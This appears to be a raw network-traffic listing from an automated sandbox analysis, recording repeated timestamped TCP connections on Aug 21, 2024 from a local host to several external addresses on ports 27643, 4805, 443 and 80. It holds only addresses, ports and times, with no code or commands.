                                      Aug 21, 2024 10:57:59.658943892 CEST276435998745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:59.659018040 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:59.659255028 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:59.664062977 CEST276435998745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:00.475445032 CEST276435998745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:00.475512028 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:00.475733042 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:01.556212902 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:01.556246996 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:01.556307077 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:01.556651115 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:01.556660891 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.028017998 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.029577017 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:02.029592037 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.177293062 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.177359104 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.177407980 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:02.177923918 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:04.431967020 CEST599894805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:04.437063932 CEST480559989135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:04.437165022 CEST599894805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:04.437510967 CEST599894805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:04.442303896 CEST480559989135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:05.478270054 CEST5999027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:05.483284950 CEST276435999045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:05.483414888 CEST5999027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:05.483633995 CEST5999027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:05.488392115 CEST276435999045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:06.144723892 CEST480559989135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:06.144783974 CEST599894805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:06.145009995 CEST599894805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:06.300348997 CEST276435999045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:06.303158998 CEST5999027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:06.303361893 CEST5999027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:07.181252956 CEST59991443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:07.181289911 CEST44359991162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:07.181516886 CEST59991443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:07.181710958 CEST59991443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:07.181720972 CEST44359991162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:07.649286985 CEST44359991162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:07.651585102 CEST59991443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:07.651601076 CEST44359991162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:07.797528028 CEST44359991162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:07.797586918 CEST44359991162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:07.797676086 CEST59991443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:07.798480034 CEST59991443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:11.150417089 CEST599924805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:11.155499935 CEST480559992135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:11.155648947 CEST599924805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:11.155895948 CEST599924805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:11.161065102 CEST480559992135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:11.307375908 CEST5999327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:11.312268019 CEST276435999345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:11.312344074 CEST5999327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:11.312571049 CEST5999327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:11.317365885 CEST276435999345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:12.140379906 CEST276435999345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:12.143167019 CEST5999327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:12.175671101 CEST5999327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:12.806133032 CEST59994443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:12.806174994 CEST44359994162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:12.806452990 CEST59994443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:12.806898117 CEST59994443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:12.806907892 CEST44359994162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:12.845339060 CEST480559992135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:12.846466064 CEST599924805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:12.846560001 CEST599924805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:13.297887087 CEST44359994162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:13.299146891 CEST59994443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:13.299165010 CEST44359994162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:13.448107004 CEST44359994162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:13.448178053 CEST44359994162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:13.448220015 CEST59994443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:13.448762894 CEST59994443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:14.158622026 CEST805998045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:14.158761978 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:14.158828020 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:14.163603067 CEST805998045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:14.179116964 CEST5999580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:14.183954954 CEST805999545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:14.184052944 CEST5999580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:14.184186935 CEST5999580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:14.188999891 CEST805999545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:17.181680918 CEST5999627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:17.187391996 CEST276435999645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:17.187489986 CEST5999627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:17.187861919 CEST5999627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:17.192785978 CEST276435999645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:17.853481054 CEST599974805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:17.858561993 CEST480559997135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:17.859172106 CEST599974805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:17.859399080 CEST599974805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:17.864713907 CEST480559997135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:18.004283905 CEST276435999645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:18.004379988 CEST5999627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:18.005070925 CEST5999627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:18.530860901 CEST59998443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:18.530905962 CEST44359998162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:18.530987978 CEST59998443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:18.531327009 CEST59998443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:18.531337023 CEST44359998162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:18.995027065 CEST44359998162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:18.996530056 CEST59998443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:18.996545076 CEST44359998162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:19.125052929 CEST44359998162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:19.125113010 CEST44359998162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:19.125169039 CEST59998443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:19.126126051 CEST59998443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:19.568169117 CEST480559997135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:19.568264008 CEST599974805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:19.568528891 CEST599974805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:23.010978937 CEST5999927643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:23.015889883 CEST276435999945.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:23.016118050 CEST5999927643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:23.016338110 CEST5999927643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:23.021033049 CEST276435999945.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:23.835954905 CEST276435999945.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:23.836036921 CEST5999927643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:23.836369038 CEST5999927643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:24.135682106 CEST60000443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:24.135710955 CEST44360000162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:24.135797024 CEST60000443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:24.136161089 CEST60000443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:24.136173964 CEST44360000162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:24.573268890 CEST600014805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:24.586504936 CEST480560001135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:24.586760998 CEST600014805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:24.587079048 CEST600014805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:24.594841957 CEST480560001135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:24.626379013 CEST44360000162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:24.627722025 CEST60000443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:24.627748966 CEST44360000162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:24.786770105 CEST44360000162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:24.786818981 CEST44360000162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:24.786876917 CEST60000443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:24.787602901 CEST60000443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:26.213013887 CEST5999580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:26.218106985 CEST6000280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:26.223002911 CEST806000245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:26.223076105 CEST6000280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:26.223206043 CEST6000280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:26.227988005 CEST806000245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:26.302488089 CEST480560001135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:26.302586079 CEST600014805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:26.302798033 CEST600014805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:28.853616953 CEST6000327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:28.858661890 CEST276436000345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:28.858733892 CEST6000327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:28.862416983 CEST6000327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:28.867814064 CEST276436000345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:29.790585995 CEST60004443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:29.790652037 CEST44360004162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:29.790803909 CEST60004443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:29.791047096 CEST60004443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:29.791063070 CEST44360004162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:29.960613966 CEST276436000345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:29.960696936 CEST6000327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:29.961293936 CEST276436000345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:29.961340904 CEST6000327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:29.961550951 CEST6000327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:30.420119047 CEST44360004162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:30.421269894 CEST60004443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:30.421298027 CEST44360004162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:30.595546007 CEST44360004162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:30.595613956 CEST44360004162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:30.595792055 CEST60004443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:30.596164942 CEST60004443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:31.306992054 CEST600054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:31.311883926 CEST480560005135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:31.311954975 CEST600054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:31.312196970 CEST600054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:31.316953897 CEST480560005135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:33.002342939 CEST480560005135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:33.003406048 CEST600054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:33.003546000 CEST600054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:34.229228973 CEST6000280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:34.232709885 CEST6000680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:34.237670898 CEST806000645.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:34.238012075 CEST6000680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:34.238300085 CEST6000680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:34.243084908 CEST806000645.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:34.978951931 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:34.983963013 CEST276436000745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:34.987284899 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:34.987456083 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:34.993334055 CEST276436000745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:35.603526115 CEST60008443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:35.603564978 CEST44360008162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:35.603847980 CEST60008443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:35.604198933 CEST60008443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:35.604212999 CEST44360008162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:35.912823915 CEST276436000745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:35.913026094 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:35.913260937 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:36.960246086 CEST276436000745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:36.960484028 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:36.961225986 CEST276436000745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:36.961383104 CEST276436000745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:36.961462021 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:36.961462021 CEST6000727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:36.962760925 CEST44360008162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:36.964195967 CEST60008443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:36.964231968 CEST44360008162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:37.113914013 CEST44360008162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:37.113981009 CEST44360008162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:37.114322901 CEST60008443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:37.118156910 CEST60008443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:38.010507107 CEST600094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:38.015350103 CEST480560009135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:38.015414000 CEST600094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:38.015980959 CEST600094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:38.021224022 CEST480560009135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:38.243340969 CEST6000680192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:38.249599934 CEST6001080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:38.254575968 CEST806001045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:38.254671097 CEST6001080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:38.254776955 CEST6001080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:38.259540081 CEST806001045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:39.705519915 CEST480560009135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:39.709203005 CEST600094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:39.709409952 CEST600094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:40.916915894 CEST6001127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:41.154529095 CEST276436001145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:41.154681921 CEST6001127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:41.154927015 CEST6001127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:41.162200928 CEST276436001145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:41.982279062 CEST276436001145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:41.982579947 CEST6001127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:41.982846975 CEST6001127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:42.118360043 CEST60012443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:42.118415117 CEST44360012162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:42.118519068 CEST60012443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:42.118992090 CEST60012443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:42.119007111 CEST44360012162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:42.262285948 CEST6001080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:42.270670891 CEST6001380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:42.277271986 CEST806001345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:42.277378082 CEST6001380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:42.281301022 CEST6001380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:42.288958073 CEST806001345.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:42.581675053 CEST44360012162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:42.592375040 CEST60012443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:42.592431068 CEST44360012162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:42.729630947 CEST44360012162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:42.729690075 CEST44360012162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:42.730165005 CEST60012443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:42.730878115 CEST60012443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:44.713346004 CEST600144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:44.718208075 CEST480560014135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:44.718287945 CEST600144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:44.718619108 CEST600144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:44.723424911 CEST480560014135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:46.290141106 CEST6001380192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:46.293212891 CEST6001580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:46.298631907 CEST806001545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:46.298738003 CEST6001580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:46.298897982 CEST6001580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:46.303750038 CEST806001545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:46.409318924 CEST480560014135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:46.409409046 CEST600144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:46.409696102 CEST600144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:46.995091915 CEST6001627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:47.000010014 CEST276436001645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:47.000231028 CEST6001627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:47.000396967 CEST6001627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:47.005951881 CEST276436001645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:47.744050026 CEST60017443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:47.744083881 CEST44360017162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:47.744158030 CEST60017443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:47.744468927 CEST60017443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:47.744484901 CEST44360017162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:47.840440989 CEST276436001645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:47.840517044 CEST6001627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:47.840719938 CEST6001627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:48.215075970 CEST44360017162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:48.217068911 CEST60017443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:48.217084885 CEST44360017162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:48.349237919 CEST44360017162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:48.349303007 CEST44360017162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:48.349365950 CEST60017443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:48.350543022 CEST60017443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:50.306446075 CEST6001580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:50.309849977 CEST6001880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:50.314987898 CEST806001845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:50.315059900 CEST6001880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:50.315246105 CEST6001880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:50.320414066 CEST806001845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:51.417726994 CEST600194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:51.422533989 CEST480560019135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:51.422617912 CEST600194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:51.422879934 CEST600194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:51.427871943 CEST480560019135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:52.853542089 CEST6002027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:52.858556032 CEST276436002045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:52.859241009 CEST6002027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:52.859545946 CEST6002027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:52.864365101 CEST276436002045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:53.111084938 CEST480560019135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:53.111172915 CEST600194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:53.111397028 CEST600194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:53.353394032 CEST60021443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:53.353435040 CEST44360021162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:53.353497982 CEST60021443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:53.353915930 CEST60021443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:53.353930950 CEST44360021162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:53.715838909 CEST276436002045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:53.719209909 CEST6002027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:53.719389915 CEST6002027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:53.929933071 CEST44360021162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:53.931751013 CEST60021443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:53.931792021 CEST44360021162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:54.085664988 CEST44360021162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:54.085732937 CEST44360021162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:54.085958004 CEST60021443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:54.086445093 CEST60021443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:54.322700977 CEST6001880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:54.328799963 CEST6002280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:54.333688974 CEST806002245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:54.333791971 CEST6002280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:54.334098101 CEST6002280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:54.339029074 CEST806002245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:58.119079113 CEST600234805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:58.124102116 CEST480560023135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:58.124213934 CEST600234805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:58.124558926 CEST600234805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:58:58.129473925 CEST480560023135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:58:58.337526083 CEST6002280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:58.343472958 CEST6002480192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:58.348386049 CEST806002445.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:58.348500013 CEST6002480192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:58.348725080 CEST6002480192.168.2.445.9.20.13
                                      Aug 21, 2024 10:58:58.353627920 CEST806002445.9.20.13192.168.2.4
                                      Aug 21, 2024 10:58:58.728760004 CEST6002527643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:58.734363079 CEST276436002545.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:58.737029076 CEST6002527643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:58.737265110 CEST6002527643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:58.744524956 CEST276436002545.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:59.104022026 CEST60026443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:59.104036093 CEST44360026162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:59.104105949 CEST60026443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:59.104676008 CEST60026443192.168.2.4162.159.130.233
